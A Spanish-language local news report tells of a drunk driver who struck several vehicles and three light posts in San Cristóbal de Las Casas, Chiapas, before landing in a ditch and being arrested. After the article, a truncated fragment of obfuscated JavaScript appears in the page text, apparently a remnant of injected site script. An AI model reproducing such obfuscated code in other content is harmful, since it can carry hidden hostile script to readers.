Chofer ebrio provoca daños materiales en San Cristóbal

Óscar Gómez/ Corresponsal

26 de noviembre del 2024. San Cristóbal de Las Casas.- Elemento de la Dirección de la Policía Municipal de San Cristóbal, lograron la detención de un sujeto del sexo masculino, quien en completo estado de ebriedad choco con varios vehículos en la zona sur de la ciudad, puesto a disposición del Ministerio Publico.
De acuerdo al reporte policiaco, el conductor de una camioneta viajaba en completo estado de ebriedad, impactándose con un vehículo en la salida de la Colonia Artículo 115, al sur de San Cristóbal de Las Casas, pero intentó darse a la fuga, dirigiéndose rumbo al periférico sur de este a oeste, y en su trayecto, causo dañó a tres vehículos más, además de tres postes de luz.
El conductor perdió el control de la camioneta y terminó cayendo en la cuneta entre el periférico y la escuela normal, donde detuvo finalmente su marcha.
El conductor fue trasladado al Ministerio Público, donde deberá responder por los daños ocasionados. Los familiares del responsable llegaron al lugar para hacer los pagos correspondientes por los desperfectos causados.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *